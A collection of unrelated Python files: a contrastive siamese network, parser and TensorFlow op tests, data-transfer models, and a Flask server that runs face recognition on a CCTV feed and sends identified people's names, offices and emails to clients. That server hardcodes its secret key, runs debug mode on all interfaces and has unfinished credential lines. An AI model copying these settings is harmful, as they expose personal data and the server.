apool: use attentional pooling instead of GAP
contrastive_loss: contrastive loss function to use
"""
super().__init__()
self.save_hyperparameters(ignore="contrastive_loss")
self.contrastive_loss = contrastive_loss
assert (
not self.hparams.siamese or self.contrastive_loss is not None
), f"Contrastive loss must be specified when using siamese network"
# create encoders
self.encoder_q, self.encoder_k = self._init_encoders(self.hparams.base_encoder)
self._override_classifier()
self._attach_projector()
def _override_classifier(self):
# hack: brute-force replacement
# Note: this method assumes that base encoder IS Pytorch ResNet (OR it has 'fc' layer)
# if you want to use other encoder, you must override this method
classifier_layer = self.encoder_q.fc
dim_fc = classifier_layer.weight.shape[1]
dim_head = self.hparams.fc_dim
self.encoder_q.fc = nn.Sequential(
nn.Linear(dim_fc, dim_head),
nn.ReLU(),
nn.Linear(dim_head, self.hparams.num_classes),
)
self.encoder_k.fc = nn.Sequential(
nn.Linear(dim_fc, dim_head),
nn.ReLU(),
nn.Linear(dim_head, self.hparams.num_classes),
)
def _attach_projector(self):
# add mlp layer for contrastive loss
mlp_q = {}
mlp_k = {}
for stage in self.hparams.stages:
block = getattr(self.encoder_q, f"layer{stage}")[-1]
if isinstance(block, Bottleneck):
dim_mlp = block.conv3.weight.shape[0]
elif isinstance(block, BasicBlock):
dim_mlp = block.conv2.weight.shape[0]
else:
raise NotImplementedError(f"{type(block)} not supported.")
emb_q = []
emb_k = []
for _ in range(self.hparams.emb_depth):
emb_q.append(nn.Linear(dim_mlp, dim_mlp))
emb_q.append(nn.ReLU())
emb_k.append(nn.Linear(dim_mlp, dim_mlp))
emb_k.append(nn.ReLU())
emb_q.append(nn.Linear(dim_mlp, self.hparams.emb_dim))
emb_k.append(nn.Linear(dim_mlp, self.hparams.emb_dim))
mlp_q[f"mlp_{stage}"] = nn.Sequential(
*emb_q,
)
mlp_k[f"mlp_{stage}"] = nn.Sequential(
*emb_k,
)
self.encoder_q.mlp = nn.ModuleDict(mlp_q)
self.encoder_k.mlp = nn.ModuleDict(mlp_k)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
for param_q, param_k in zip(
self.encoder_q.parameters(), self.encoder_k.parameters()
):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
def _init_encoders(self, base_encoder):
encoder_q = base_encoder(pretrained=True)
encoder_k = base_encoder(pretrained=True)
return encoder_q, encoder_k
@torch.no_grad()
def _batch_shuffle_ddp(self, x): # pragma: no cover
"""
Batch shuffle, for making use of BatchNorm.
*** Only support DistributedDataParallel (DDP) model. ***
"""
# gather from all gpus
batch_size_this = x.shape[0]
x_gather = concat_all_gather(x)
batch_size_all = x_gather.shape[0]
num_gpus = batch_size_all // batch_size_this
# random shuffle index
idx_shuffle = torch.randperm(batch_size_all).cuda()
# broadcast to all gpus
torch.distributed.broadcast(idx_shuffle, src=0)
# index for restoring
idx_unshuffle = torch.argsort(idx_shuffle)
# shuffled index for this gpu
gpu_idx = torch.distributed.get_rank()
idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]
return x_gather[idx_this], idx_unshuffle
@torch.no_grad()
def _batch_unshuffle_ddp(self, x, idx_unshuffle): # pragma: no cover
"""
Undo batch shuffle.
*** Only support DistributedDataParallel (DDP) model. ***
"""
# gather from all gpus
batch_size_this = x.shape[0]
x_gather = concat_all_gather(x)
batch_size_all = x_gather.shape[0]
num_gpus = batch_size_all // batch_size_this
# restored index for this gpu
gpu_idx = torch.distributed.get_rank()
idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]
return x_gather[idx_this]
def forward(self, img_q, img_k):
y_pred, features_q = self.encoder_q(img_q)
self.contrastive_loss.on_forward(
encoder_q=self.encoder_q,
encoder_k=self.encoder_k,
)
features = []
# compute key features
with torch.no_grad(): # no gradient to keys
# shuffle for making use of BN
# When chunking is enabled, shuffle doesn't work
# if self.trainer.use_ddp or self.trainer.use_ddp2:
# img_k, idx_unshuffle = self._batch_shuffle_ddp(img_k)
_, features_k = self.encoder_k(img_k)
if self.hparams.apool:
_, features_k_on_q = self.encoder_q(img_k)
for idx, stage in enumerate(self.hparams.stages):
features_q[stage] = self.chunk_feature(
features_q[stage], self.hparams.num_patches
)
if self.hparams.apool:
q = self.adaptive_pool(features_q[stage], features_q[stage])
else:
q = self.avgpool(features_q[stage])
q = torch.flatten(q, 1)
q = self.encoder_q.mlp[f"mlp_{stage}"](q)
q = nn.functional.normalize(q, dim=1)
with torch.no_grad():
features_k[stage] = self.chunk_feature(
features_k[stage], self.hparams.num_patches
)
features_k_on_q[stage] = self.chunk_feature(
features_k_on_q[stage], self.hparams.num_patches
)
if self.hparams.apool:
k = self.adaptive_pool(features_k[stage], features_k_on_q[stage])
else:
k = self.avgpool(features_k[stage])
# undo shuffle
# When chunking is enabled, shuffle doesn't work
# if self.trainer.use_ddp or self.trainer.use_ddp2:
# k = self._batch_unshuffle_ddp(k, idx_unshuffle)
k = torch.flatten(k, 1)
k = self.encoder_k.mlp[f"mlp_{stage}"](k)
k = nn.functional.normalize(k, dim=1)
features.append(
{
"q": q,
"k": k,
"stage": stage,
}
)
return y_pred, features
def training_step(self, batch, batch_idx):
# Freeze batchnorm layers
self.apply(set_bn_eval)
(img_1, img_2), labels = batch
y_pred, features = self(img_q=img_1, img_k=img_2)
loss_class = F.cross_entropy(y_pred, labels.long())
loss_contrastive = 0.0
if self.hparams.siamese:
loss_contrastive = sum(
[
self.contrastive_loss(f["q"], f["k"], stage=f["stage"])
for f in features
]
)
acc1, acc5 = precision_at_k(y_pred, labels, top_k=(1, 5))
loss = loss_class + loss_contrastive
log = {
"train_loss": loss,
"train_loss_class": loss_class,
"train_loss_contrastive": loss_contrastive,
"train_acc1": acc1,
"train_acc5": acc5,
}
self.log_dict(log, sync_dist=True)
return loss
def validation_step(self, batch, batch_idx):
img, labels = batch
y_pred, _ = self.encoder_q(img)
if self.hparams.flip_on_validation:
y_pred_flip, _ = self.encoder_q(torch.flip(img, dims=(3,)))
y_pred = (y_pred + y_pred_flip) / 2
loss = F.cross_entropy(y_pred, labels.long())
acc1, acc5 = precision_at_k(y_pred, labels, top_k=(1, 5))
results = {"val_loss": loss, "val_acc1": acc1, "val_acc5": acc5}
return results
def validation_epoch_end(self, results):
val_loss = mean(results, "val_loss")
val_acc1 = mean(results, "val_acc1")
val_acc5 = mean(results, "val_acc5")
log = {"val_loss": val_loss, "val_acc1": val_acc1, "val_acc5": val_acc5}
self.log_dict(log, sync_dist=True)
try:
# LightningModule.print() has an issue on printing when validation mode
self.print(
f"[Epoch {self.current_epoch}]: [Val loss: {val_loss:.3f} / Val acc1: {val_acc1:.3f} / Val acc5: {val_acc5:.3f}]"
)
except:
pass
def adaptive_pool(self, features, attention_base):
assert features.shape == attention_base.shape
batch_size = features.shape[0]
gap = torch.flatten(self.avgpool(attention_base), start_dim=1)
attention = torch.einsum("nchw,nc->nhw", [attention_base, gap])
attention /= torch.einsum("nhw->n", [attention]).view(batch_size, 1, 1)
features_with_attention = torch.einsum("nchw,nhw->nchw", [features, attention])
return torch.einsum("nchw->nc", [features_with_attention])
def chunk_feature(self, feature, num_chunks):
if num_chunks == 1:
return feature
chunks = torch.chunk(feature, num_chunks, dim=2)
chunks = [torch.chunk(c, num_chunks, dim=3) for c in chunks]
chunked_feature = []
for c in chunks:
chunked_feature += c
return torch.cat(chunked_feature, dim=0)
def configure_optimizers(self):
optimizer = torch.optim.SGD(
self.parameters(),
self.hparams.learning_rate,
momentum=self.hparams.momentum,
weight_decay=self.hparams.weight_decay,
)
scheduler = WarmupConstantSchedule(
optimizer=optimizer,
warmup_steps=self.hparams.warmup_iters,
)
return {
"optimizer": optimizer,
"lr_scheduler": {
"scheduler": scheduler,
"interval": "step",
},
}
class SiameseNetSegmentation(SiameseNet):
def __init__(
self,
base_encoder,
num_classes=12,
emb_dim=128,
emb_depth=1,
fc_dim=512,
num_patches=8,
learning_rate=0.1,
momentum=0.9,
weight_decay=5e-4,
batch_size=32,
stages=(3, 4),
siamese=True,
flip_on_validation=False,
apool=True,
warmup_iters=500,
contrastive_loss=None,
*args,
**kwargs,
):
super().__init__(
base_encoder=base_encoder,
num_classes=num_classes,
emb_dim=emb_dim,
emb_depth=emb_depth,
learning_rate=learning_rate,
momentum=momentum,
weight_decay=weight_decay,
batch_size=batch_size,
stages=stages,
siamese=siamese,
flip_on_validation=flip_on_validation,
fc_dim=fc_dim,
num_patches=num_patches,
apool=apool,
warmup_iters=500,
contrastive_loss=contrastive_loss,
*args,
**kwargs,
)
self.iou = IoU(num_classes=self.hparams.num_classes)
self.criterion = nn.CrossEntropyLoss(ignore_index=255, reduction="mean")
def _override_classifier(self):
self.encoder_q.aspp = ASPP(2048, self.hparams.num_classes, [6, 12, 18, 24])
self.encoder_k.aspp = ASPP(2048, self.hparams.num_classes, [6, 12, 18, 24])
def training_step(self, batch, batch_idx):
self.apply(set_bn_eval)
(img_1, img_2), labels = batch
y_pred, features = self(img_q=img_1, img_k=img_2)
loss_class = self.criterion(y_pred, labels.long())
loss_contrastive = 0.0
if self.hparams.siamese:
loss_contrastive = sum(
[
self.contrastive_loss(f["q"], f["k"], stage=f["stage"])
for f in features
]
)
loss = loss_class + loss_contrastive
log = {
"train_loss": loss,
"train_loss_class": loss_class,
"train_loss_contrastive": loss_contrastive,
}
self.log_dict(log, sync_dist=True)
return loss
def validation_step(self, batch, batch_idx):
img, labels = batch
y_pred, _ = self.encoder_q(img)
loss = self.criterion(y_pred, labels.long())
self.iou(y_pred.argmax(dim=1), labels.long())
results = {"val_loss": loss}
return results
def validation_epoch_end(self, results):
val_loss = mean(results, "val_loss")
val_iou = self.iou.compute()
self.iou.reset()
log = {"val_loss": val_loss, "val_iou": val_iou}
self.log_dict(log, sync_dist=True)
try:
# LightningModule.print() has an issue on printing when validation mode
self.print(
f"[Epoch {self.current_epoch}]: [Val loss: {val_loss:.3f} / Val mIoU: {val_iou:.3f}]"
)
except:
pass
@torch.no_grad()
def concat_all_gather(tensor):
"""
Performs all_gather operation on the provided tensors.
*** Warning ***: torch.distributed.all_gather has no gradient.
"""
tensors_gather = [
torch.ones_like(tensor) for _ in range(torch.distributed.get_world_size())
]
torch.distributed.all_gather(tensors_gather, tensor, async_op=False)
output = torch.cat(tensors_gather, dim=0)
return output
def set_bn_eval(module):
if isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):
module.eval()
|
<reponame>antmicro/raviewer<filename>tests/grayscale_test.py
from raviewer.parser.grayscale import ParserGrayscale
import unittest
import numpy
from unittest.mock import (Mock, patch)
from enum import Enum
class DummyPixelFormat(Enum):
MONO = 1
class DummyEndianness(Enum):
LITTLE_ENDIAN = 1
BIG_ENDIAN = 2
class DummyPixelPlane(Enum):
PACKED = 1
class TestGrayscaleParserClass(unittest.TestCase):
def setUp(self):
self.GRAY_FORMAT = Mock(pixel_format=DummyPixelFormat.MONO,
endianness=DummyEndianness.BIG_ENDIAN,
pixel_plane=DummyPixelPlane.PACKED)
self.GRAY_FORMAT.bits_per_components = (8, 0, 0, 0)
self.GRAY12_FORMAT = Mock(pixel_format=DummyPixelFormat.MONO,
endianness=DummyEndianness.BIG_ENDIAN,
pixel_plane=DummyPixelPlane.PACKED)
self.GRAY12_FORMAT.bits_per_components = (12, 0, 0, 0)
self.GRAY_IMAGE = Mock(color_format=self.GRAY_FORMAT,
width=2,
height=1)
self.GRAY_IMAGE.processed_data = numpy.array([0, 255])
self.raw_data = bytes((0, 255))
self.GRAY_IMAGE.data_buffer = self.raw_data
self.GRAY12_IMAGE = Mock(color_format=self.GRAY12_FORMAT,
width=1,
height=1)
self.GRAY12_IMAGE.processed_data = numpy.array([255])
self.GRAY12_IMAGE.data_buffer = self.raw_data
self.parser = ParserGrayscale()
@patch("raviewer.parser.common.Endianness", DummyEndianness)
def test_parse(self):
parsed_img = self.parser.parse(self.raw_data, self.GRAY_FORMAT, 2)
self.assertEqual(parsed_img.data_buffer, self.GRAY_IMAGE.data_buffer)
self.assertEqual(parsed_img.width, self.GRAY_IMAGE.width)
self.assertEqual(parsed_img.height, self.GRAY_IMAGE.height)
self.assertEqual(parsed_img.color_format, self.GRAY_IMAGE.color_format)
self.assertTrue((
parsed_img.processed_data == self.GRAY_IMAGE.processed_data).all())
parsed_img = self.parser.parse(self.raw_data, self.GRAY12_FORMAT, 1)
self.assertEqual(parsed_img.data_buffer, self.GRAY12_IMAGE.data_buffer)
self.assertEqual(parsed_img.width, self.GRAY12_IMAGE.width)
self.assertEqual(parsed_img.height, self.GRAY12_IMAGE.height)
self.assertEqual(parsed_img.color_format,
self.GRAY12_IMAGE.color_format)
self.assertTrue(
(parsed_img.processed_data == self.GRAY12_IMAGE.processed_data
).all())
def test_get_displayable(self):
displayable = self.parser.get_displayable(self.GRAY_IMAGE)
self.assertEqual(displayable.shape,
(self.GRAY_IMAGE.height, self.GRAY_IMAGE.width, 3))
self.assertTrue(
(displayable == numpy.array([[[0, 0, 0], [255, 255, 255]]])).all())
displayable = self.parser.get_displayable(self.GRAY12_IMAGE)
self.assertEqual(
displayable.shape,
(self.GRAY12_IMAGE.height, self.GRAY12_IMAGE.width, 3))
self.assertTrue((displayable == numpy.array([[[15, 15, 15]]])).all())
|
from flask import Flask, render_template, Response, redirect, request, session
import cv2
import time
import requests
from flask_socketio import SocketIO, emit
import os
import threading
import tts_stt
import base64
import numpy as np
import glob
import argparse
import dlib
import os
from utils.aux_functions import *
import math
from RetinaFace.retinaface_cov import RetinaFaceCoV
from PIL import Image, ImageFile
import tensorflow as tf
from parameters import *
import keras
from numpy import load
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import Normalizer
from sklearn.svm import SVC
import pickle
from numpy import dot
from numpy.linalg import norm
import loadmodel
import re
import sys
import time
import subprocess
import inspect
import requests
from bs4 import BeautifulSoup
import pandas as pd
import datetime
import json
import smtplib
from email.mime.text import MIMEText
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
## function define ##
def send_mail(text):
smtp = smtplib.SMTP('smtp.gmail.com', 587)
smtp.ehlo()
smtp.starttls()
my_email = # Fill your Email
my_email_pw = # Fill your PW
your_email = text['email']
smtp.login(my_email, my_email_pw)
results = ""
for i in range(len(text['title'])):
results += '\n'
results += '제목 : ' + text['title'][i] + '\n'
results += '-' * (3 * len(text['title'][i]) + 5) + '\n'
results += '내용 : ' + text['content'][i] + '\n'
results += '\n'
results += '\n'
message = MIMEText(results)
message['Subject'] = str(datetime.datetime.now()) + '_기사 모음'
message['From'] = my_email
message['To'] = your_email
smtp.sendmail(my_email, your_email, message.as_string())
smtp.quit()
def img_to_encoding2(image, model, path=True):
img = image
img = tf.keras.applications.inception_resnet_v2.preprocess_input(img)
x_train = np.array([img])
embedding = model.predict_on_batch(x_train)
return embedding
def cos_sim(A, B):
return dot(A,B) / (norm(A) * norm(B))
## function define ##
print('Ready to Starting POSVATOR SERVER......')
app = Flask(__name__)
app.config['SECRET_KEY'] = 'poscointernational'
socketio = SocketIO(app)
thread = None
detector = None
model = None
known_face_encodings = None
known_face_names = None
def gen():
global detector, model, known_face_encodings, known_face_names
"""Video streaming generator function."""
detector, model = loadmodel.load_models()
## extract embeddings from databases ##
thresh = 0.8
mask_thresh = 0.2
known_face_encodings = dict()
users = dict()
files = glob.glob('./users/*.jpg')
total_news = dict()
news = dict()
tfidf = TfidfVectorizer()
korname2engname = dict()
for file in files:
sep = file.split('/')[2]
r_sep = sep.split('_')
if r_sep[1] == 'augmentation':
pass
else:
total_news[r_sep[3]] = { 'title' : [] , 'contents' : [], 'summary' : [] }
known_face_encodings[r_sep[0]] = []
korname2engname[r_sep[3]] = r_sep[0]
print(known_face_encodings)
print(korname2engname)
crawled_news = pd.read_csv('reco2.csv')
for i in range(len(crawled_news)):
user = crawled_news.iloc[i]['user']
title = crawled_news.iloc[i]['title']
content = crawled_news.iloc[i]['contents']
summary = crawled_news.iloc[i]['summary']
total_news[user]['title'].append(title)
total_news[user]['contents'].append(content)
total_news[user]['summary'].append(summary)
for file in files:
scales = [640, 1080]
img = cv2.imread(file)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (640, 480), interpolation=cv2.INTER_CUBIC)
im_shape = img.shape
target_size = scales[0]
max_size = scales[1]
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
im_scale = float(target_size) / float(im_size_min)
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
scales = [im_scale]
flip = False
faces, landmarks = detector.detect(img, thresh, scales=scales, do_flip=flip)
if len(faces) != 0:
box = faces[0][0:4].astype(np.int)
cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]), (0,0,255), 2)
croped_img = img[box[1]:box[3], box[0]:box[2]]
croped_img = cv2.resize(croped_img, (160, 160), cv2.INTER_CUBIC)
lab = cv2.cvtColor(croped_img, cv2.COLOR_BGR2LAB)
lab_planes = cv2.split(lab)
clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8 ,8))
lab_planes[0] = clahe.apply(lab_planes[0])
lab = cv2.merge(lab_planes)
croped_img = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
emb = img_to_encoding2(croped_img, model)[0]
emb = emb.reshape(-1)
infos = file.split('/')[2]
info = infos.split('_')
if info[1] == 'augmentation':
known_face_encodings[korname2engname[info[0]]].append(emb)
continue
else:
known_face_encodings[info[0]].append(emb)
# floor, company, count, real_name, email
users[info[0]] = [info[1], info[2], 0, info[3], info[4][:-4]]
cctv_url = 'http://posproject201013.iptime.org:8787/video_feed'
video = cv2.VideoCapture(cctv_url)
mask_count = 0
mask_count_thresh = 15
while True:
try:
scales = [640, 1080]
_, img = video.read()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
im_shape = img.shape
target_size = scales[0]
max_size = scales[1]
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
#im_scale = 1.0
#if im_size_min>target_size or im_size_max>max_size:
im_scale = float(target_size) / float(im_size_min)
# prevent bigger axis from being more than max_size:
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
scales = [im_scale]
flip = False
faces, landmarks = detector.detect(img, thresh, scales=scales, do_flip=flip)
if faces is None:
continue
if len(faces) != 0:
for i in range(faces.shape[0]):
face = faces[i]
box = face[0:4].astype(np.int)
mask = face[5]
name = "Unknown"
if mask>=mask_thresh:
name = 'Mask Detected. Please take off your mask.'
### R G B
color = (0,0,255)
else:
color = (0,255,0)
croped_img = img[box[1]:box[3], box[0]:box[2]]
croped_img = cv2.resize(croped_img, (160, 160), cv2.INTER_CUBIC)
lab = cv2.cvtColor(croped_img, cv2.COLOR_BGR2LAB)
lab_planes = cv2.split(lab)
clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8 ,8))
lab_planes[0] = clahe.apply(lab_planes[0])
lab = cv2.merge(lab_planes)
croped_img = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
emb = img_to_encoding2(croped_img, model)[0]
emb = emb.reshape(-1)
sim = 0.5
idx = 0
for names in known_face_encodings.keys():
for user_emb in known_face_encodings[names]:
cur_sim = cos_sim(user_emb, emb)
if sim < cur_sim:
sim = cur_sim
name = names
if sim < 0.80:
name = 'Unknown'
cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]), color, 2)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(img, name, (box[0] + 6, box[1] - 6), font, 1.0, (255, 255, 255), 1)
if name != 'Mask Detected. Please take off your mask.' and name != 'Unknown':
print(name, 'detected !!!')
users[name][2] += 1
if users[name][2] >= 15:
print('데이터전송')
socketio.emit('message', {'name': users[name][3], 'floor' : users[name][0], 'company': users[name][1], 'title':total_news[users[name][3]]['title'], 'content':total_news[users[name][3]]['summary'],'send':total_news[users[name][3]]['contents'], 'email' : users[name][4]})
users[name][2] = 0
else:
if name == 'Mask Detected. Please take off your mask.':
mask_count += 1
if mask_count >= mask_count_thresh:
mask_count_thresh += mask_count * 2
mask_count = 0
print('음성 재생 필요!')
requests.get(url = 'http://posproject201013.iptime.org:8787/take_mask')
print('no one detected.')
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
ret, jpeg = cv2.imencode('.jpg', img)
# print("after get_frame")
if img is not None:
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + jpeg.tobytes() + b'\r\n')
except Exception as e:
print('error occured', e)
time.sleep(0.01)
@socketio.on('email')
def handle_my_custom_event(json):
print('received json: ' + str(json))
send_mail(json)
@app.route('/video_feed')
def video_feed():
"""Video streaming route. Put this in the src attribute of an img tag."""
return Response(gen(), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route("/")
def index():
return render_template("index.html", data=None )
@socketio.on('connect')
def connect():
print('client connected!')
if __name__ == '__main__':
socketio.run(app, host='0.0.0.0', port=8999, debug=True)
|
<gh_stars>10-100
import os
import sys
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
from tensorflow.python.ops import gradient_checker
sys.path.append('../..')
from cext import primitive_mutex_loss
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
class PrimitiveMutexLossTest(test.TestCase):
def _VerifyValuesNew(self, in_z, in_q, in_t, scale, expected):
with self.test_session() as sess:
z = constant_op.constant(in_z)
q = constant_op.constant(in_q)
t = constant_op.constant(in_t)
data_out = primitive_mutex_loss(z, q, t, scale=scale)
actual = sess.run(data_out)
self.assertAllClose(expected, actual.flatten(), atol=1e-6)
def _VerifyGradientsNew(self, in_z, in_q, in_t, scale, n_cube, batch_size):
with self.test_session() as sess:
z = constant_op.constant(in_z, shape=[batch_size, 3*n_cube])
q = constant_op.constant(in_q, shape=[batch_size, 4*n_cube])
t = constant_op.constant(in_t, shape=[batch_size, 3*n_cube])
data_out = primitive_mutex_loss(z, q, t, scale=scale)
ret = gradient_checker.compute_gradient(
[z, q, t],
[[batch_size, 3*n_cube], [batch_size, 4*n_cube], [batch_size, 3*n_cube]],
data_out,
[1],
x_init_value=[np.asfarray(in_z).reshape([batch_size, 3*n_cube]),
np.asfarray(in_q).reshape([batch_size, 4*n_cube]),
np.asfarray(in_t).reshape([batch_size, 3*n_cube])]
)
# print(ret)
self.assertAllClose(ret[0][0], ret[0][1], atol=5e-4)
self.assertAllClose(ret[1][0], ret[1][1], atol=5e-4)
self.assertAllClose(ret[2][0], ret[2][1], atol=5e-4)
def testForward_degenerate(self):
in_z = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
in_q = [[1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0]]
in_t = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
scale = 1
expected = [0.0]
self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)
def testForward_0(self):
in_z = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
in_t = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
scale = 1
expected = [0.003704] # 0.1 / 27 == 0.003704
self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)
def testForward_1(self):
in_z = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
in_t = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
scale = 0.9
expected = [0.013333]
self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)
def testForward_2(self):
in_z = [[0.1, 0.1, 0.1, 0.2, 0.3, 0.4], [0.1, 0.1, 0.1, 0.2, 0.3, 0.4]]
in_q = [[1.0, 0.0, 0.0, 0.0, 0.5, 0.5, 0.5, 0.5], [1.0, 0.0, 0.0, 0.0, 0.5, 0.5, 0.5, 0.5]]
in_t = [[0.1, 0.1, 0.1, 0.2, 0.3, 0.4], [0.1, 0.1, 0.1, 0.2, 0.3, 0.4]]
scale = 1
expected = [0.005556]
self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)
def testForward_3(self):
in_z = [[0.1, 0.2, 0.3, 0.1, 0.2, 0.3], [0.1, 0.2, 0.3, 0.1, 0.2, 0.3]]
in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
in_t = [[0.1, 0.2, 0.3, 0.28, 0.56, 0.84], [0.1, 0.2, 0.3, 0.28, 0.56, 0.84]]
scale = 1
expected = [0.000741]
self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)
def testBackward_degenerate(self):
in_z = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
in_q = [[1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0]]
in_t = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
scale = 1
n_cube = 1
batch_size = 2
self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)
def testBackward_0(self):
# carefully design the distance along each axis
# when add delta, the minimal distance axis should not change
# x axis
in_z = [[0.1, 0.2, 0.3, 0.1, 0.2, 0.3], [0.1, 0.2, 0.3, 0.1, 0.2, 0.3]]
in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
in_t = [[0.1, 0.2, 0.3, 0.28, 0.56, 0.84], [0.1, 0.2, 0.3, 0.28, 0.56, 0.84]]
scale = 1
n_cube = 2
batch_size = 2
self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)
def testBackward_1(self):
# carefully design the distance along each axis
# when add delta, the minimal distance axis should not change
# y axis
in_z = [[0.2, 0.1, 0.3, 0.2, 0.1, 0.3], [0.2, 0.1, 0.3, 0.2, 0.1, 0.3]]
in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
in_t = [[0.2, 0.1, 0.3, 0.56, 0.28, 0.84], [0.2, 0.1, 0.3, 0.56, 0.28, 0.84]]
scale = 1
n_cube = 2
batch_size = 2
self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)
def testBackward_2(self):
# carefully design the distance along each axis
# when add delta, the minimal distance axis should not change
# z axis
in_z = [[0.3, 0.2, 0.1, 0.3, 0.2, 0.1], [0.3, 0.2, 0.1, 0.3, 0.2, 0.1]]
in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
in_t = [[0.3, 0.2, 0.1, 0.84, 0.56, 0.28], [0.3, 0.2, 0.1, 0.84, 0.56, 0.28]]
scale = 1
n_cube = 2
batch_size = 2
self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)
if __name__ == '__main__':
test.main()
|
from schematics import Model
from schematics.exceptions import ValidationError
from schematics.types import StringType, IntType, EmailType, LongType, BooleanType
from schematics.types.compound import ListType, ModelType, BaseType
from server.models.dtos.stats_dto import Pagination
from server.models.postgis.statuses import MappingLevel, UserRole
def is_known_mapping_level(value):
""" Validates that supplied mapping level is known value """
if value.upper() == 'ALL':
return True
try:
MappingLevel[value.upper()]
except KeyError:
raise ValidationError(f'Unknown mappingLevel: {value} Valid values are {MappingLevel.BEGINNER.name}, '
f'{MappingLevel.INTERMEDIATE.name}, {MappingLevel.ADVANCED.name}, ALL')
def is_known_role(value):
""" Validates that supplied user role is known value """
try:
UserRole[value.upper()]
except KeyError:
raise ValidationError(f'Unknown mappingLevel: {value} Valid values are {UserRole.ADMIN.name}, '
f'{UserRole.PROJECT_MANAGER.name}, {UserRole.MAPPER.name}, {UserRole.VALIDATOR.name}')
class UserDTO(Model):
""" DTO for User """
validation_message = BooleanType(default=True)
id = LongType()
username = StringType()
role = StringType()
mapping_level = StringType(serialized_name='mappingLevel', validators=[is_known_mapping_level])
tasks_mapped = IntType(serialized_name='tasksMapped')
tasks_validated = IntType(serialized_name='tasksValidated')
tasks_invalidated = IntType(serialized_name='tasksInvalidated')
email_address = EmailType(serialized_name='emailAddress', serialize_when_none=False)
is_email_verified = EmailType(serialized_name='isEmailVerified', serialize_when_none=False)
twitter_id = StringType(serialized_name='twitterId')
facebook_id = StringType(serialized_name='facebookId')
linkedin_id = StringType(serialized_name='linkedinId')
class UserStatsDTO(Model):
""" DTO containing statistics about the user """
time_spent_mapping = IntType(serialized_name='timeSpentMapping')
class UserOSMDTO(Model):
""" DTO containing OSM details for the user """
account_created = StringType(required=True, serialized_name='accountCreated')
changeset_count = IntType(required=True, serialized_name='changesetCount')
class MappedProject(Model):
""" Describes a single project a user has mapped """
project_id = IntType(serialized_name='projectId')
name = StringType()
tasks_mapped = IntType(serialized_name='tasksMapped')
tasks_validated = IntType(serialized_name='tasksValidated')
status = StringType()
centroid = BaseType()
aoi = BaseType()
class UserMappedProjectsDTO(Model):
""" DTO for projects a user has mapped """
def __init__(self):
super().__init__()
self.mapped_projects = []
mapped_projects = ListType(ModelType(MappedProject), serialized_name='mappedProjects')
